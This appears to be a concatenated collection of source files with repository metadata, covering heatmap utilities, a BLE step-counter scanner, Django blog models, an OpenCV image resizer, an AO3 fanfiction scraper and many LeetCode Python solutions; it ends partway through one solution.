heatmap = np.exp(-exponent)
am = np.amax(heatmap)
if am > 0:
heatmap /= am / 255.
return heatmap
all_keypoints = label
point_num = all_keypoints.shape[0]
heatmaps_this_img=np.zeros([map_size[0]//stride,map_size[1]//stride,point_num])
for k in range(point_num):
heatmap = produce_heat_map([all_keypoints[k][0],all_keypoints[k][1]], map_size, stride, sigma)
heatmaps_this_img[:,:,k]=heatmap
return heatmaps_this_img
def visualize_heatmap_target(heatmap):
map_size=heatmap.shape[0:2]
frame_num = heatmap.shape[2]
heat_ = np.zeros([map_size[0], map_size[1]])
for i in range(frame_num):
heat_ = heat_ + heatmap[:, :, i]
cv2.namedWindow('heat_map', 0)
cv2.imshow('heat_map', heat_)
cv2.waitKey(0)
def produce_heatmaps_with_bbox(image,label,h_out,w_out,num_klass,ksize=9,sigma=0):
heatmap=np.zeros(shape=[h_out,w_out,num_klass])
h,w,_=image.shape
for single_box in label:
if single_box[4]>=0:
####box center (x,y)
center=[(single_box[0]+single_box[2])/2/w,(single_box[1]+single_box[3])/2/h] ###0-1
heatmap[round(center[1]*h_out),round(center[0]*w_out),int(single_box[4]) ]=1.
heatmap = cv2.GaussianBlur(heatmap, (ksize,ksize), sigma)
am = np.amax(heatmap)
if am>0:
heatmap /= am / 255.
heatmap=np.expand_dims(heatmap,-1)
return heatmap
def produce_heatmaps_with_keypoint(image,label,h_out,w_out,num_klass,ksize=7,sigma=0):
heatmap=np.zeros(shape=[h_out,w_out,num_klass])
h,w,_=image.shape
for i in range(label.shape[0]):
single_point=label[i]
if single_point[0]>0 and single_point[1]>0:
heatmap[int(single_point[1]*(h_out-1)),int(single_point[0]*(w_out-1)),i ]=1.
heatmap = cv2.GaussianBlur(heatmap, (ksize,ksize), sigma)
am = np.amax(heatmap)
if am>0:
heatmap /= am / 255.
return heatmap
if __name__=='__main__':
pass
``` |
{
"source": "610t/reBoundBlocker",
"score": 2
} |
#### File: reBoundBlocker/BLE/Get_from_M5Walker.py
```python
from bluepy.btle import Peripheral, DefaultDelegate, Scanner, BTLEException, UUID
import bluepy.btle
import sys
import struct
from datetime import datetime
import argparse
import time
total_step=0
last_step=0
last_seq=0
devs = {
'M5Walker': {'companyID': 'ffff'}
}
target = 'M5Walker'
Debugging = False
def DBG(*args):
if Debugging:
msg = " ".join([str(a) for a in args])
print(msg)
sys.stdout.flush()
Verbose = True
def MSG(*args):
if Verbose:
msg = " ".join([str(a) for a in args])
print(msg)
sys.stdout.flush()
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
self.lastseq = None
self.lasttime = datetime.fromtimestamp(0)
def handleDiscovery(self, dev, isNewDev, isNewData):
if isNewDev or isNewData:
for (adtype, desc, value) in dev.getScanData():
DBG(adtype, desc, value)
if target in ('M5Walker'):
if desc == 'Manufacturer' and value[0:4] == devs[target]['companyID']:
delta = datetime.now() - self.lasttime
if value[4:6] != self.lastseq and delta.total_seconds() > 11: # アドバタイズする10秒の間に測定が実行されseqが加算されたものは捨てる
global last_seq, total_step, last_step
seq = int(value[4:6], 16)
if seq < last_seq:
total_step += last_step
last_seq = seq
DBG("Seq:", self.lastseq)
self.lasttime = datetime.now()
DBG("Time:", self.lasttime)
DBG("Value:",value[6:10],bytes.fromhex(value[6:10]))
step = struct.unpack('<h', bytes.fromhex(value[6:10]))[0]
print("Step:", str(step+total_step))
sys.stdout.flush()
last_step = step
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d',action='store_true', help='debug msg on')
args = parser.parse_args(sys.argv[1:])
global Debugging
Debugging = args.d
bluepy.btle.Debugging = args.d
global target
print(target)
scanner = Scanner().withDelegate(ScanDelegate())
while True:
try:
scanner.scan(5.0) # スキャンする。デバイスを見つけた後の処理はScanDelegateに任せる
except BTLEException:
MSG('BTLE Exception while scannning.')
if __name__ == "__main__":
main()
``` |
{
"source": "610yilingliu/blog_for_fun",
"score": 2
} |
#### File: myblog/myblog/models.py
```python
from django.db import models
from django.urls import reverse
class Category(models.Model):
name = models.CharField(max_length = 100,unique=True)
def __str__(self):
return self.name
class Tag(models.Model):
name = models.CharField(max_length = 50,unique=True)
def __str__(self):
return self.name
class Language(models.Model):
name = models.CharField(max_length = 10,unique=True)
def __str__(self):
return self.name
class Article(models.Model):
title = models.CharField(max_length = 100,unique=True)
body = models.TextField()
create_time = models.DateTimeField()
modify_time = models.DateTimeField()
tags = models.ManyToManyField(Tag)
summary = models.CharField(max_length = 300, blank = True)
## if no CASCADE, there will be an error while migrating database.
category = models.ForeignKey(Category, on_delete = models.CASCADE)
language = models.ForeignKey(Language, on_delete = models.CASCADE)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('myblog:article', kwargs={'pk': self.pk})
``` |
{
"source": "610yilingliu/excel-like-python-curve-fitter",
"score": 3
} |
#### File: excel-like-python-curve-fitter/test/test_runner.py
```python
import unittest
from pygrapher.runner import *
import matplotlib.pyplot as plt
class TestRunner(unittest.TestCase):
# def test_linear_fitter(self):
# x_array = [1, 2, 22, 3, 4]
# y_array = [1, 2, 3.5, 4.7777, 5]
# point_range = [0, 10]
# linear_fitter(x_array = x_array, y_origin = y_array, range = point_range, line_color = 'red', point_color = 'blue', label = 'fuck', point_label = 'point')
def test_poly_fitter(self):
x_array = [1, 2, 3, 4, 6]
y_array = [3, 6, 7, 5, 2]
point_range = [0, 20]
poly_fitter(3, x_array = x_array, y_origin = y_array, range = point_range, line_color = 'red', point_color = 'blue', label = 'fuck', point_label = 'point')
poly_fitter(2, x_array, y_array, point_range)
plt.show()
def test_exp_fitter(self):
x_array = [1, 2, 3, 4, 5]
y_array = [3, 4, 5, 7, 6]
point_range = [0, 20]
exp_fitter(x_array, y_array, point_range, e_base = False, param = True)
exp_fitter(x_array, y_array, point_range)
plt.show()
# def test_log_fitter(self):
# x_array = [1, 2, 3, 4, 5, 7]
# y_array = [2, 6, 3, 7, 2, 5]
# point_range = [0, 100]
# log_fitter(x_array, y_array, point_range)
``` |
{
"source": "610yilingliu/GenerateHouseNumber",
"score": 3
} |
#### File: 610yilingliu/GenerateHouseNumber/regularize_image.py
```python
import cv2
import os
import numpy as np
def regularize_img(path, dest, size):
"""
:type path: String, image path
:type path: String, destination path
:type size: Tuple, (height, width)
"""
img = cv2.imread(path)
h = img.shape[0]
l = img.shape[1]
# If length: height is too large, it will cause deformation while resize. My solution is to put it over a white background for regularization
# For height:length is the same.
if l > 1.3 * h:
bkg_size = l
# 255 is used to generate white background. np.zeros will generate black background.
# If you still confused with it, just notice that (0, 0, 0) is black and (255, 255, 255) is white
blank_img = np.zeros((bkg_size, bkg_size, 3)) + 255
start = (l - h)//2
blank_img[start:start + h, :] = img[:, :]
img = blank_img
elif h > 1.3 * l:
bkg_size = h
blank_img = np.zeros((bkg_size, bkg_size, 3)) + 255
start = (h - l) // 2
blank_img[:, start:start + l] = img[:, :]
img = blank_img
res = cv2.resize(img, size)
cv2.imwrite(dest, res)
def make_gray(path, dest):
"""
:type path: String, image path
:type path: String, destination path
"""
img = cv2.imread(path)
img_gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
cv2.imwrite(dest, img_gray)
if __name__ == '__main__':
root = './raw_imgs/'
out = './imgs/'
files = os.listdir(root)
for f in files:
path = root + f
regularize_img(path, out + f, (32, 32))
outgray = './img_gray/'
files = os.listdir(out)
for f in files:
path = out + f
make_gray(path, outgray + f)
``` |
{
"source": "610yilingliu/Get-Ao3-Article",
"score": 3
} |
#### File: Get-Ao3-Article/pkg/article.py
```python
import requests
import re
def cleaner(text):
'''
Clean the html code
Variable type: text - String
'''
replace_dict = {
'<!--main content-->':'\n',
'<!--chapter content-->':'\n',
'<div class=\"userstuff module\" role=\"article\">': '',
'<div class=\"userstuff\">': '',
'<h3 class=\"landmark heading\" id=\"work\">':'',
'<div id=\"chapters\" role=\"article\">':'',
'</h3>': '\n',
'<p>':'',
'</p>': '\n',
'<br/>': '\n',
'<div>': '',
'</div>':'',
'<p dir=\"ltr\">':'',
'<blockquote class=\"userstuff\">': '',
'</blockquote>':'\n',
'<!-- end cache -->':'\n',
'<!--/main-->':'\n',
'<!--/chapter-->': '\n',
'<h3 class="heading">':'',
'<div class="notes module" role="complementary">':'',
'</a>':' ',
'<b>':'',
'</b>':'',
'<!--/descriptions-->': '\n',
'<p class=\"jump\">(See the end of the work for <a href=\"#work_endnotes\">more notes .)': '\n',
}
if text!= None:
for key in replace_dict.keys():
text = text.replace(key, replace_dict[key])
return text.strip()
else:
return None
class article(object):
'''
Get article page content
Variable type: url - String
'''
def __init__(self, url,
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
}):
req = requests.get(url, headers = header)
html = req.text
self.__html = html
self.__url = url
self.__header = header
def geturl(self):
'''
return url string
'''
return self.__url
def gethtml(self):
'''
return html string
'''
return self.__html
def gettitle(self):
'''
return title string
'''
html = self.__html
pattern = re.compile(r'<title>\n(.*)\n')
title = pattern.search(html).groups()[0]
# delete space
title = title.strip()
title = title.replace(''','\'')
return title
def getauthor(self):
'''
return author string
'''
html = self.__html
pattern = re.compile(r'(?<=<a rel="author" href="\/users\/)(.*?)(?=<\/a>)')
mixed = pattern.search(html).groups()[0]
pattern2 = re.compile(r'(?<=\">)(.*)')
author = pattern2.search(mixed).groups()[0]
return author
def getchap(self):
'''
return chapter list
'''
html = self.__html
pattern = re.compile(r'<h3 class=\"title\">\s+<a href=.*>(.*?)</a>')
search_result = pattern.findall(html)
if search_result != []:
chapters = [cleaner(chapter) for chapter in search_result]
return chapters
return None
def getsummary(self):
'''
return summary list
'''
html = self.__html
pattern = re.compile(r'<h3 class=\"heading\">Summary\:<\/h3>([\s\S]*)<\/blockquote>')
search_result = pattern.findall(html)
if search_result !=[]:
summaries = [cleaner(summary) for summary in search_result]
return summaries
return None
def getnotes(self):
'''
return notes list
'''
html = self.__html
pattern = re.compile(r'<h3 class=\"heading\">Notes\:<\/h3>([\s\S]*?)<\/blockquote>')
search_result = pattern.findall(html)
if search_result!= []:
notes = [cleaner(note) for note in search_result]
return notes
return None
def getcontent(self):
'''
return content string
'''
html = self.__html
# not good enough.(?:<\!--main content-->|<\!--chapter content-->)[\s\S]*(?:<\!--\/chapter-->|<\!--\/main-->) works in regexr but does not work here
pattern1 = re.compile(r'<\!--chapter content-->([\s\S]*)<\!--\/main-->')
pattern2 = re.compile(r'<\!--chapter content-->([\s\S]*)<\!--\/chapter-->')
pattern3 = re.compile(r'<\!--main content-->([\s\S]*)<\!--\/chapter-->')
pattern4 = re.compile(r'<\!--main content-->([\s\S]*)<\!--\/main-->')
plist = [pattern1, pattern2, pattern3, pattern4]
for pattern in plist:
search_result = pattern.search(html)
if search_result != None:
content = search_result.groups()[0]
return cleaner(content)
else:
print('Page type not supported, please check if it is from ao3')
print(self.geturl())
input("Press enter to close program")
exit()
def get_related_chaps(self):
'''
return related chapters(list)
'''
html = self.__html
pattern = re.compile(r'(?<=a href=\")(.*)(?=\">Full-page index)')
res = re.search(pattern, html)
if res != None:
list_suffix = res.groups()[0]
chap_list_url = 'https://archiveofourown.org/' + list_suffix
list_html = requests.get(chap_list_url, headers = self.__header).text
article_pattern = re.compile(r'(?<=<li><a href=\"\/)works\/\d{1,}\/chapters\/\d{1,}(?=\")')
article_urls_suffix = re.findall(article_pattern, list_html)
article_urls = ['https://archiveofourown.org/' + url for url in article_urls_suffix]
return article_urls
return None
# if __name__ == '__main__':
# a = article('https://archiveofourown.org/works/22393369?view_adult=true?')
# re = a.get_related_chaps()
# print(re)
``` |
{
"source": "610yilingliu/leetcode",
"score": 3
} |
#### File: leetcode/Python3/1002.find-common-characters.py
```python
import collections
# @lc code=start
class Solution:
def commonChars(self, A: List[str]) -> List[str]:
if not A:
return []
if len(A) == 1:
return [char for char in A[0]]
pred = collections.Counter(A[0])
for i in range(1, len(A)):
curd = collections.Counter(A[i])
pred = self.findcommon(pred, curd)
ans = []
for k, v in pred.items():
for _ in range(v):
ans.append(k)
return ans
def findcommon(self, d1, d2):
rd = dict()
for k in d1:
if k in d2:
rd[k] = min(d1[k], d2[k])
return rd
# @lc code=end
```
#### File: leetcode/Python3/1015.smallest-integer-divisible-by-k.py
```python
class Solution(object):
def smallestRepunitDivByK(self, K):
if K % 2 == 0 or K % 5 == 0: return -1
rem, steps = 1, 1
while rem % K != 0:
rem = (rem*10 + 1) % K
steps += 1
return steps
# @lc code=end
```
#### File: leetcode/Python3/1022.sum-of-root-to-leaf-binary-numbers.py
```python
class Solution:
def sumRootToLeaf(self, root: TreeNode):
if not root:
return 0
self.bins = []
self.finder(root, '')
ans = 0
for item in self.bins:
cur = 0
digit = 0
while item:
cur += (int(item[-1]) & 1) * (1 << digit)
item = item[:-1]
digit += 1
ans += cur
return ans
def finder(self, root, path):
path = path + str(root.val)
if not root.left and not root.right:
self.bins.append(path)
return
if root.left:
self.finder(root.left, path)
if root.right:
self.finder(root.right, path)
# @lc code=end
```
#### File: leetcode/Python3/1035.uncrossed-lines.py
```python
class Solution:
def maxUncrossedLines(self, A: List[int], B: List[int]) -> int:
if not A or not B:
return 0
dp = [[0] * (len(A) + 1) for _ in range(len(B) + 1)]
for i in range(1, len(B) + 1):
for j in range(1, len(A) +1):
if B[i - 1] == A[j - 1]:
dp[i][j] = dp[i - 1][j - 1] + 1
else:
dp[i][j] = max(dp[i][j - 1], dp[i - 1][j])
return dp[-1][-1]
# @lc code=end
```
#### File: leetcode/Python3/1038.binary-search-tree-to-greater-sum-tree.py
```python
class Solution:
def bstToGst(self, root):
if not root:
return
self.ls = []
self.inorder(root)
def traveller(node):
if not node:
return
idx = self.ls.index(node.val)
new = sum(self.ls[idx:])
node.val = new
traveller(node.left)
traveller(node.right)
traveller(root)
return root
def inorder(self, root):
if not root:
return
self.inorder(root.left)
self.ls.append(root.val)
self.inorder(root.right)
# @lc code=end
```
#### File: leetcode/Python3/106.construct-binary-tree-from-inorder-and-postorder-traversal.py
```python
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def buildTree(self, inorder, postorder):
if not inorder or not postorder:
return None
node = TreeNode(postorder[-1])
inorder_idx = inorder.index(postorder[-1])
node.left = self.buildTree(inorder[:inorder_idx], postorder[:inorder_idx])
node.right = self.buildTree(inorder[inorder_idx + 1:], postorder[inorder_idx: len(postorder) - 1])
return node
if __name__ == '__main__':
a = Solution()
b = a.buildTree([9,3,15,20,7], [9,15,7,20,3])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/1099.two-sum-less-than-k.py
```python
class Solution:
def twoSumLessThanK(self, A, K):
A.sort()
if len(A) < 2 or A[0] + A[1] > K:
return -1
curmax = -1
for i in range(len(A) - 1, 0, -1):
for j in range(i - 1, -1, -1):
if A[i] > K:
continue
cursum = A[i] + A[j]
if cursum < K and cursum > curmax:
curmax = cursum
return curmax
# @lc code=end
```
#### File: leetcode/Python3/1115.print-foo-bar-alternately.py
```python
from threading import Lock
class FooBar:
def __init__(self, n):
self.n = n
self.fool = Lock()
self.barl = Lock()
self.barl.acquire()
def foo(self, printFoo: 'Callable[[], None]'):
for i in range(self.n):
# printFoo() outputs "foo". Do not change or remove this line.
self.fool.acquire()
printFoo()
self.barl.release()
def bar(self, printBar: 'Callable[[], None]'):
for i in range(self.n):
# printBar() outputs "bar". Do not change or remove this line.
self.barl.acquire()
printBar()
self.fool.release()
# @lc code=end
```
#### File: leetcode/Python3/114.flatten-binary-tree-to-linked-list.py
```python
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def flatten(self, root):
"""
Do not return anything, modify root in-place instead.
"""
if not root:
return
l = root.left
r = root.right
root.left = None
self.flatten(l)
self.flatten(r)
root.right = l
while root.right:
root = root.right
root.right = r
# def flatten(self, root):
# if not root:
# return
# ls = []
# def preorder(root):
# if not root:
# return
# ls.append(root)
# if root.left:
# preorder(root.left)
# if root.right:
# preorder(root.right)
# preorder(root)
# for i in range(len(ls) - 1):
# ls[i].left = None
# ls[i].right = ls[i + 1]
# return root
# @lc code=end
```
#### File: leetcode/Python3/116.populating-next-right-pointers-in-each-node.py
```python
class Node:
def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):
self.val = val
self.left = left
self.right = right
self.next = next
class Solution:
def connect(self, root: 'Node') -> 'Node':
if not root:
return None
count = 0
store = []
def generator(node, count):
if not node:
return
if count >= len(store):
store.append([])
store[count].append(node)
if node.left:
generator(node.left, count + 1)
if node.right:
generator(node.right, count + 1)
generator(root, count)
for item in store:
for i in range(len(item) - 1):
item[i].next = item[i + 1]
item[-1].next = None
return store[0][0]
# @lc code=end
```
#### File: leetcode/Python3/120.triangle.py
```python
class Solution:
def minimumTotal(self, triangle):
if len(triangle) == 1:
return triangle[0][0]
s = 0
start_x = 0
size = len(triangle)
mat = [[0] * (size) for _ in range(size)]
mat[0][0] = triangle[0][0]
# adjacent: next[idx] = prev[idx] or prev[idx + 1]
for i in range(1, size):
mat[i][0] = mat[i - 1][0] + triangle[i][0]
mat[i][i] = mat[i - 1][i - 1] + triangle[i][i]
for j in range(1, len(triangle[i]) - 1):
mat[i][j] = min(mat[i - 1][j - 1], mat[i - 1][j]) + triangle[i][j]
return min(mat[-1])
# @lc code=end
```
#### File: leetcode/Python3/122.best-time-to-buy-and-sell-stock-ii.py
```python
class Solution:
def maxProfit(self, prices):
if len(prices) < 2:
return 0
profit = 0
peak_pos = 0
velly_pos = 0
i = 0
while i < len(prices) - 1:
while i < len(prices) - 1 and prices[i] >= prices[i + 1]:
i += 1
velly_pos = i
while i < len(prices) - 1 and prices[i] <= prices[i + 1]:
i += 1
peak_pos = i
profit += prices[peak_pos] - prices[velly_pos]
return profit
if __name__ == '__main__':
a = Solution()
b = a.maxProfit([0,5,5,6,2,1,1,3])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/123.best-time-to-buy-and-sell-stock-iii.py
```python
import collections
# @lc code=start
class Solution:
def maxProfit(self, prices):
# if len(prices) < 2:
# return 0
# rg = len(prices)
# prof = [[0] * rg for _ in range(rg)]
# for i in range(rg):
# for j in range(rg):
# if i > j and prices[i] - prices[j] > 0:
# prof[i][j] = prices[i] - prices[j]
# maxprof = 0
# # start from mat[y][0]
# for x in range(0, rg - 1):
# for y in range(x + 1, rg):
# temp_prof = prof[y][x]
# x2 = y + 1
# maxprof = max(maxprof, temp_prof)
# if x2 < rg:
# while x2 < rg:
# for y2 in range(x2 + 1, rg):
# cur_val = prof[y2][x2]
# maxprof = max(maxprof, temp_prof + cur_val)
# x2 += 1
# return maxprof
# state: having a transaction or not
if len(prices) < 2:
return 0
dp = [[[0 for state in range(2)] for trans_did in range(3)] for day in range(len(prices))]
for t in range(3):
dp[0][t][0] = 0
dp[0][t][1] = -prices[0]
for p in range(1, len(prices)):
for i in range(1, 3):
dp[p][i][0] = max(dp[p - 1][i][0], dp[p - 1][i][1] + prices[p])
dp[p][i][1] = max(dp[p - 1][i][1], dp[p - 1][i - 1][0] - prices[p])
return dp[-1][-1][0]
if __name__ == '__main__':
a = Solution()
b = a.maxProfit([3,3,5,0,0,3,1,4])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/124.binary-tree-maximum-path-sum.py
```python
class Solution:
def maxPathSum(self, root: TreeNode):
self.mx = float('-inf')
self.traveller(root, 0)
return self.mx
def traveller(self, node, cursum):
if not node:
return cursum
cursum += node.val
l = 0
r = 0
if node.left:
l = self.traveller(node.left, cursum)
if node.right:
r = self.traveller(node.right, cursum)
# self.mx: keep the origional maximum value
# l + r + node.val: left sum + right sum + current val
# node.val: current val (if left sum < 0 and right sum < 0, use this one)
# l + node.val: left sum + current val
# r + node.val: right sum + current val
self.mx = max(self.mx, l + r + node.val, node.val, l + node.val, r + node.val)
return max(l + node.val, r + node.val, node.val)
# @lc code=end
```
#### File: leetcode/Python3/125.valid-palindrome.py
```python
class Solution:
def isPalindrome(self, s):
# lowercase = chr(ord(uppercase) - 32)
# lower: 97-122
# upper: 65-90
# 0-9: 48 - 57
l = 0
r = len(s) - 1
s = list(s)
while l < r:
if s[l] == s[r]:
l += 1
r -= 1
elif (48 <= ord(s[l]) <= 57 or 97 <= ord(s[l]) <= 122) and (48 <= ord(s[r]) <= 57 or 97 <= ord(s[r]) <= 122) and s[l] != s[r]:
return False
else:
# not belong to letters
if ord(s[l]) < 48 or 57 < ord(s[l]) < 65 or 90 < ord(s[l]) < 97 or ord(s[l]) > 122:
l += 1
if ord(s[r]) < 48 or 57 < ord(s[r]) < 65 or 90 < ord(s[r]) < 97 or ord(s[r]) > 122:
r -= 1
if 65 <= ord(s[l]) <= 90:
s[l] = chr(ord(s[l]) + 32)
if 65 <= ord(s[r]) <= 90:
s[r] = chr(ord(s[r]) + 32)
return True
if __name__ == '__main__':
a = Solution()
b = a.isPalindrome("A man, a plan, a canal: Panama")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/128.longest-consecutive-sequence.py
```python
import collections
class Solution:
def longestConsecutive(self, nums):
d = {}
mx = 0
for num in nums:
if num not in d:
left = d.get(num - 1, 0)
right = d.get(num + 1, 0)
l = left + right + 1
mx = max(mx, l)
for number in [num - left, num, num + right]:
d[number] = l
return mx
if __name__ == '__main__':
a = Solution()
b = a.longestConsecutive([4,0,-4,-2,2,5,2,0,-8,-8,-8,-8,-1,7,4,5,5,-4,6,6,-3])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/1306.jump-game-iii.py
```python
class Solution:
def canReach(self, arr: List[int], start: int) -> bool:
visited_pos = set()
def dfs(pos):
if pos >= len(arr):
return False
if pos < 0:
return False
if pos in visited_pos:
return
if arr[pos] == 0:
return True
visited_pos.add(pos)
left_pos = pos - arr[pos]
right_pos = pos + arr[pos]
if dfs(left_pos) or dfs(right_pos):
return True
return False
return dfs(start)
# @lc code=end
```
#### File: leetcode/Python3/132.palindrome-partitioning-ii.py
```python
class Solution:
def minCut(self, s):
if not s or len(s) == 1:
return 0
helper = [i for i in range(len(s) + 1)]
for i in range(len(s)):
for j in range(i):
if self.is_pa(s[j: i + 1]):
helper[i + 1] = min(helper[i + 1], helper[j] + 1)
helper[i + 1] = min(helper[i + 1], helper[i] + 1)
return helper[-1] - 1
def is_pa(self, string):
return string == string[::-1]
if __name__ == '__main__':
a = Solution()
b = a.minCut("aab")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/133.clone-graph.py
```python
class Node:
def __init__(self, val = 0, neighbors = []):
self.val = val
self.neighbors = neighbors
class Solution:
def cloneGraph(self, node):
root = self.dfs(node, {})
return root
def dfs(self, node, d):
if not node:
return None
if node in d:
return d[node]
node_copy = Node(node.val, [])
d[node] = node_copy
for item in node.neighbors:
next_copy = self.dfs(item, d)
if next_copy:
node_copy.neighbors.append(next_copy)
return node_copy
# @lc code=end
```
#### File: leetcode/Python3/140.word-break-ii.py
```python
class Solution:
def wordBreak(self, s, wordDict):
# # O(2 ^ n)
# dp = [False] * (len(s) + 1)
# dp[0] = True
# words = wordDict
# result = []
# def backtracker(dp, path, start = 0):
# if dp[-1]:
# result.append(' '.join(path))
# for i in range(start + 1, len(dp)):
# cur = s[start:i]
# if cur in words:
# next_dp = dp.copy()
# next_dp[i] = True
# backtracker(next_dp, path + [cur], i)
# backtracker(dp, [])
# return result
if not s:
return []
def searcher(s, words, visited):
if s in visited:
return visited[s]
if not s:
return []
ans = []
for word in words:
if not s.startswith(word):
continue
if len(word) == len(s):
ans.append(word)
else:
res = searcher(s[len(word):], words, visited)
for item in res:
item = word + ' ' + item
ans.append(item)
visited[s] = ans
return ans
return searcher(s, wordDict, {})
if __name__ == '__main__':
a = Solution()
b = a.wordBreak("catsanddog",["cat", "cats", "and", "sand", "dog"])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/15.3-sum.py
```python
class Solution:
def threeSum(self, nums):
l = len(nums)
if l < 3:
return []
sol = []
nums.sort()
for i in range(l - 2):
if nums[i] + nums[i + 1] + nums[i + 2] > 0:
break
if nums[i] + nums[l - 1] + nums[l - 2] < 0:
continue
if i > 0 and nums[i] == nums[i - 1]:
continue
mid = i + 1
right = l - 1
while mid < right:
tmp = nums[i] + nums[mid] + nums[right]
if tmp == 0:
sol.append([nums[i], nums[mid], nums[right]])
while mid + 1 < right and nums[mid] == nums[mid + 1]:
mid = mid + 1
mid = mid + 1
while mid < right - 1 and nums[right] == nums[right - 1]:
right = right - 1
right = right - 1
elif tmp > 0:
right = right -1
else:
mid = mid + 1
return sol
if __name__ == '__main__':
a = Solution()
b = a.threeSum([-1,0,1,2,-1,-4])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/159.longest-substring-with-at-most-two-distinct-characters.py
```python
import collections
class Solution:
def lengthOfLongestSubstringTwoDistinct(self, s):
"""
:type s: String
:rtype: int
"""
mxlen = 0
lp, rp = 0, 0
tool_dict = collections.defaultdict(int)
tool_set = set()
while rp < len(s):
tool_dict[s[rp]] += 1
tool_set.add(s[rp])
if len(tool_set) > 2:
mxlen = max(mxlen, rp - lp)
while lp < rp and len(tool_set) > 2:
tool_dict[s[lp]] -= 1
if tool_dict[s[lp]] == 0:
tool_set.remove(s[lp])
lp += 1
rp += 1
mxlen = max(mxlen, rp - lp)
return mxlen
# @lc code=end
```
#### File: leetcode/Python3/161.one-edit-distance.py
```python
class Solution:
def isOneEditDistance(self, s: str, t: str):
if s == t:
return False
if abs(len(s) - len(t)) > 1:
return False
def repair(shorter, longer):
shorter = shorter + ' '
c = 0
for i in range(len(longer)):
if shorter[i]!= longer[i]:
if c > 0:
return False
shorter = shorter[:i] + longer[i] + shorter[i:]
c += 1
return True
if len(s) < len(t):
return repair(s, t)
if len(s) > len(t):
return repair(t, s)
counter = 0
for i in range(len(s)):
if s[i] != t[i]:
if counter > 0:
return False
counter += 1
return True
# if __name__ == '__main__':
# a = Solution()
# b = a.isOneEditDistance("a", '')
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/163.missing-ranges.py
```python
class Solution:
def findMissingRanges(self, nums: List[int], lower: int, upper: int):
if not nums:
if lower == upper:
return [str(lower)]
return [str(lower) + '->' + str(upper)]
if nums[0] == upper == lower:
return []
ans = []
if nums[0] > lower:
if nums[0] - lower == 1:
ans.append(str(lower))
else:
ans.append(str(lower) + '->' + str(nums[0] - 1))
for i in range(1, len(nums)):
if nums[i] - nums[i - 1] == 1 or nums[i] == nums[i - 1]:
continue
if nums[i] - nums[i - 1] == 2:
ans.append(str(nums[i - 1] + 1))
else:
ans.append(str(nums[i - 1] + 1) + '->' + str(nums[i] - 1))
if nums[-1] < upper:
if upper - nums[-1] == 1:
ans.append(str(upper))
else:
ans.append(str(nums[-1] + 1) + '->' + str(upper))
return ans
# @lc code=end
```
#### File: leetcode/Python3/168.excel-sheet-column-title.py
```python
class Solution:
def convertToTitle(self, n):
res = ''
while n:
num = (n - 1) % 26
res = chr(ord('A') + num) + res
n = (n - 1) // 26
return res
if __name__ == '__main__':
a = Solution()
b = a.convertToTitle(52)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/188.best-time-to-buy-and-sell-stock-iv.py
```python
import collections
# @lc code=start
class Solution:
def maxProfit(self, k, prices):
if len(prices) < 2:
return 0
if k > len(prices)//2:
return sum(i - j for i, j in zip(prices[1:], prices[:-1]) if i - j > 0)
dp = [[[0 for state in range(2)] for trans in range(k + 1)] for day in range(len(prices))]
for trans in range(k + 1):
dp[0][trans][0] = 0
dp[0][trans][1] = -prices[0]
for p in range(1, len(prices)):
for i in range(1, k + 1):
dp[p][i][0] = max(dp[p - 1][i][0], dp[p - 1][i][1] + prices[p])
dp[p][i][1] = max(dp[p - 1][i][1], dp[p - 1][i - 1][0] - prices[p])
return dp[-1][-1][0]
# if __name__ == '__main__':
# a = Solution()
# b = a.maxProfit(3, [3,3,5,0,0,3,1,4])
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/199.binary-tree-right-side-view.py
```python
class Solution:
def rightSideView(self, root):
if not root:
return []
storage = []
def traveller(root, level):
if len(storage) <= level:
storage.append([])
storage[level].append(root.val)
if root.left:
traveller(root.left, level + 1)
if root.right:
traveller(root.right, level + 1)
traveller(root, 0)
ans = []
for level in storage:
ans.append(level[-1])
return ans
# @lc code=end
```
#### File: leetcode/Python3/207.course-schedule.py
```python
import collections
# @lc code=start
class Solution:
def canFinish(self, numCourses, prerequisites):
child = collections.defaultdict(int)
parent = collections.defaultdict(set)
for item in prerequisites:
parent[item[1]].add(item[0])
child[item[0]] += 1
for i in range(numCourses):
has_zero = False
for item in range(numCourses):
if child[item] == 0:
has_zero = True
child[item] = -1
break
if not has_zero:
return False
for thing in parent[item]:
child[thing] -= 1
return True
# @lc code=end
```
#### File: leetcode/Python3/215.kth-largest-element-in-an-array.py
```python
class Solution:
def findKthLargest(self, nums: List[int], k: int):
counter = 0
while counter < k - 1:
nums.remove(max(nums))
counter += 1
return max(nums)
# @lc code=end
```
#### File: leetcode/Python3/216.combination-sum-iii.py
```python
class Solution:
def combinationSum3(self, k, n):
if k == 0 or n == 0:
return []
self.ans = []
self.k = k
self.back(n, 0, [])
return self.ans
def back(self, rest, count, path):
if rest == 0 and count == self.k:
self.ans.append(path)
if rest > (self.k - count) * 9:
return
if rest < self.k - count:
return
if rest < 0:
return
for i in range(1, 10):
if not path or (path and i > path[-1]):
self.back(rest - i, count + 1, path + [i])
if __name__ == '__main__':
a = Solution()
b = a.combinationSum3(3, 7)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/220.contains-duplicate-iii.py
```python
import collections
# @lc code=start
class Solution:
def containsNearbyAlmostDuplicate(self, nums, k, t):
if k < 0 or t < 0:
return False
if t == 0:
# if no duplicated number
